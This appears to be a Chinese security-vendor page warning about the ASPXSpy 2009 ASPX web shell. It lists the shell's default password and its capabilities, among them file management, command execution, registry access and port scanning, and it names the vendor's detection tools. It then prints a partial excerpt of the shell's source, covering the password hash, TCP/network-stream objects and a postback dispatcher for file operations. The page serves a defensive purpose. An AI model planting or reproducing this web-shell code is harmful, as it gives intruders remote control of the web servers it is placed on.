ASPXSpy Ver 2009

2011-12-13 16:39:57 来源:本站原创,请勿转载 浏览:507
ASPXSpy Ver 2009

木马名称:ASPXSpy Ver 2009
木马格式:aspx
默认密码:admin
木马作用:运行在aspx环境的网页木马,由于aspx的.net环境本身的权限较高,所以aspx木马的破坏性很强大,如:文件管理,运行CMD,查看IIS信息,进程信息,系统服务,用户信息,系统信息,文件搜索,注册表,端口扫描,数据库连接,端口映射等。

运行界面如下:

总结:ASPXSpy 是.net下的木马,功能确实有点强大,要注意防范!
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 ASPXSpy Ver 2009  这个asp网页木马。

ASPXSpy Ver 2009部分代码:
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<script runat='server'>
public string Password='21232f297a57a5a743894a0e4a801fc3';//admin
public string vbhLn='ASPXSpy';
public int TdgGU=3-2;
protected OleDbConnection Dtdr=new OleDbConnection();
protected OleDbCommand Kkvb=new OleDbCommand();
public NetworkStream NS=null;
public NetworkStream NS1=null;
TcpClient tcp=new TcpClient();
TcpClient zvxm=new TcpClient();
ArrayList IVc=new ArrayList();
protected void Page_load(object sender,EventArgs e)
{
YFcNP(this);
fhAEn();
if (!pdo())
{
return;
}
if(IsPostBack)
{
string tkI=Request['__EVENTTARGET'];
string VqV=Request['__File'];
if(tkI!='')
{
switch(tkI)
{
case 'Bin_Parent':
krIR(Ebgw(VqV));
break;
case 'Bin_Listdir':
krIR(Ebgw(VqV));
break;
case 'kRXgt':
kRXgt(Ebgw(VqV));
break;
case 'Bin_Createfile':
gLKc(VqV);
break;
case 'Bin_Editfile':
gLKc(VqV);
break;

(0)
(0)